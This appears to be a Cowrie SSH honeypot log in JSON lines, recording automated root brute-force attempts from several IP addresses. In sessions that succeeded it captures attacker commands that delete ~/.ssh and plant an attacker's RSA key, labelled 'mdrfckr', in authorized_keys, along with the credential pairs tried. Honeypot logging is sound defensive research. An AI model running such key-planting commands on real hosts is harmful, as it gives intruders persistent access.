{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-26T13:49:04.143204Z","src_ip":"113.141.82.238","session":"94b27965cb15"}
{"eventid":"cowrie.session.closed","duration":"4.4","message":"Connection lost after 4.4 seconds","sensor":"my-vps","timestamp":"2025-08-26T13:49:05.950429Z","src_ip":"113.141.82.238","session":"94b27965cb15"}
{"eventid":"cowrie.session.connect","src_ip":"113.141.82.238","src_port":36808,"dst_ip":"1.2.3.4","dst_port":22,"session":"886cec51ea05","protocol":"ssh","message":"New connection: 113.141.82.238:36808 (1.2.3.4:22) [session: 886cec51ea05]","sensor":"my-vps","timestamp":"2025-08-26T13:49:06.183973Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T13:49:06.184639Z","src_ip":"113.141.82.238","session":"886cec51ea05"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T13:49:06.417549Z","src_ip":"113.141.82.238","session":"886cec51ea05"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-26T13:49:07.390738Z","src_ip":"113.141.82.238","session":"886cec51ea05"}
{"eventid":"cowrie.session.closed","duration":"10.0","message":"Connection lost after 10.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T13:49:07.614181Z","src_ip":"113.141.82.238","session":"e1a2986505a8"}
{"eventid":"cowrie.session.closed","duration":"1.4","message":"Connection lost after 1.4 seconds","sensor":"my-vps","timestamp":"2025-08-26T13:49:07.625785Z","src_ip":"113.141.82.238","session":"886cec51ea05"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":51844,"dst_ip":"1.2.3.4","dst_port":22,"session":"3e83815a8bec","protocol":"ssh","message":"New connection: 212.227.235.229:51844 (1.2.3.4:22) [session: 3e83815a8bec]","sensor":"my-vps","timestamp":"2025-08-26T13:49:13.348395Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T13:49:13.349415Z","src_ip":"212.227.235.229","session":"3e83815a8bec"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T13:49:13.591118Z","src_ip":"212.227.235.229","session":"3e83815a8bec"}
{"eventid":"cowrie.session.connect","src_ip":"167.99.49.89","src_port":42344,"dst_ip":"1.2.3.4","dst_port":22,"session":"19171ebf543e","protocol":"ssh","message":"New connection: 167.99.49.89:42344 (1.2.3.4:22) [session: 19171ebf543e]","sensor":"my-vps","timestamp":"2025-08-26T13:49:13.628418Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T13:49:13.629202Z","src_ip":"167.99.49.89","session":"19171ebf543e"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T13:49:13.718092Z","src_ip":"167.99.49.89","session":"19171ebf543e"}
{"eventid":"cowrie.login.success","username":"root","password":"abc_123","message":"login attempt [root/abc_123] succeeded","sensor":"my-vps","timestamp":"2025-08-26T13:49:14.115750Z","src_ip":"167.99.49.89","session":"19171ebf543e"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T13:49:14.374095Z","src_ip":"167.99.49.89","session":"19171ebf543e"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T13:49:14.374791Z","src_ip":"167.99.49.89","session":"19171ebf543e"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T13:49:14.375885Z","src_ip":"167.99.49.89","session":"19171ebf543e"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T13:49:14.466122Z","src_ip":"167.99.49.89","session":"19171ebf543e"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T13:49:14.663088Z","src_ip":"167.99.49.89","session":"19171ebf543e"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-26T13:49:14.663871Z","src_ip":"167.99.49.89","session":"19171ebf543e"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-26T13:49:14.754439Z","src_ip":"167.99.49.89","session":"19171ebf543e"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T13:49:14.755415Z","src_ip":"167.99.49.89","session":"19171ebf543e"}
{"eventid":"cowrie.session.connect","src_ip":"167.99.49.89","src_port":42348,"dst_ip":"1.2.3.4","dst_port":22,"session":"779ee721146e","protocol":"ssh","message":"New connection: 167.99.49.89:42348 (1.2.3.4:22) [session: 779ee721146e]","sensor":"my-vps","timestamp":"2025-08-26T13:49:14.859508Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T13:49:14.860295Z","src_ip":"167.99.49.89","session":"779ee721146e"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T13:49:14.964409Z","src_ip":"167.99.49.89","session":"779ee721146e"}
{"eventid":"cowrie.login.success","username":"root","password":"Test123.","message":"login attempt [root/Test123.] succeeded","sensor":"my-vps","timestamp":"2025-08-26T13:49:15.055494Z","src_ip":"212.227.235.229","session":"3e83815a8bec"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-26T13:49:15.422216Z","src_ip":"167.99.49.89","session":"779ee721146e"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T13:49:15.598308Z","src_ip":"212.227.235.229","session":"3e83815a8bec"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T13:49:15.599064Z","src_ip":"212.227.235.229","session":"3e83815a8bec"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T13:49:15.600240Z","src_ip":"212.227.235.229","session":"3e83815a8bec"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T13:49:15.843558Z","src_ip":"212.227.235.229","session":"3e83815a8bec"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T13:49:16.349627Z","src_ip":"212.227.235.229","session":"3e83815a8bec"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-26T13:49:16.350303Z","src_ip":"212.227.235.229","session":"3e83815a8bec"}
{"eventid":"cowrie.session.closed","duration":"1.7","message":"Connection lost after 1.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T13:49:16.531691Z","src_ip":"167.99.49.89","session":"779ee721146e"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-26T13:49:16.595070Z","src_ip":"212.227.235.229","session":"3e83815a8bec"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T13:49:16.595888Z","src_ip":"212.227.235.229","session":"3e83815a8bec"}
{"eventid":"cowrie.session.connect","src_ip":"167.99.49.89","src_port":42360,"dst_ip":"1.2.3.4","dst_port":22,"session":"d8656f9c6701","protocol":"ssh","message":"New connection: 167.99.49.89:42360 (1.2.3.4:22) [session: d8656f9c6701]","sensor":"my-vps","timestamp":"2025-08-26T13:49:16.622092Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T13:49:16.622704Z","src_ip":"167.99.49.89","session":"d8656f9c6701"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T13:49:16.714876Z","src_ip":"167.99.49.89","session":"d8656f9c6701"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":51852,"dst_ip":"1.2.3.4","dst_port":22,"session":"810fdc641908","protocol":"ssh","message":"New connection: 212.227.235.229:51852 (1.2.3.4:22) [session: 810fdc641908]","sensor":"my-vps","timestamp":"2025-08-26T13:49:16.831006Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T13:49:16.831969Z","src_ip":"212.227.235.229","session":"810fdc641908"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-26T13:49:17.126387Z","src_ip":"167.99.49.89","session":"d8656f9c6701"}
{"eventid":"cowrie.session.closed","duration":"3.6","message":"Connection lost after 3.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T13:49:17.218615Z","src_ip":"167.99.49.89","session":"19171ebf543e"}
{"eventid":"cowrie.session.closed","duration":"0.6","message":"Connection lost after 0.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T13:49:17.219757Z","src_ip":"167.99.49.89","session":"d8656f9c6701"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T13:49:17.879928Z","src_ip":"212.227.235.229","session":"810fdc641908"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-26T13:49:18.832954Z","src_ip":"212.227.235.229","session":"810fdc641908"}
{"eventid":"cowrie.session.closed","duration":"3.2","message":"Connection lost after 3.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T13:49:20.074790Z","src_ip":"212.227.235.229","session":"810fdc641908"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":51868,"dst_ip":"1.2.3.4","dst_port":22,"session":"a03620b84341","protocol":"ssh","message":"New connection: 212.227.235.229:51868 (1.2.3.4:22) [session: a03620b84341]","sensor":"my-vps","timestamp":"2025-08-26T13:49:20.321409Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T13:49:20.322065Z","src_ip":"212.227.235.229","session":"a03620b84341"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T13:49:20.569852Z","src_ip":"212.227.235.229","session":"a03620b84341"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-26T13:49:21.598391Z","src_ip":"212.227.235.229","session":"a03620b84341"}
{"eventid":"cowrie.session.closed","duration":"1.5","message":"Connection lost after 1.5 seconds","sensor":"my-vps","timestamp":"2025-08-26T13:49:21.848404Z","src_ip":"212.227.235.229","session":"a03620b84341"}
{"eventid":"cowrie.session.closed","duration":"8.5","message":"Connection lost after 8.5 seconds","sensor":"my-vps","timestamp":"2025-08-26T13:49:21.851388Z","src_ip":"212.227.235.229","session":"3e83815a8bec"}
{"eventid":"cowrie.session.connect","src_ip":"45.88.8.215","src_port":52548,"dst_ip":"1.2.3.4","dst_port":22,"session":"dbb407ec2c98","protocol":"ssh","message":"New connection: 45.88.8.215:52548 (1.2.3.4:22) [session: dbb407ec2c98]","sensor":"my-vps","timestamp":"2025-08-26T13:49:27.752593Z"}
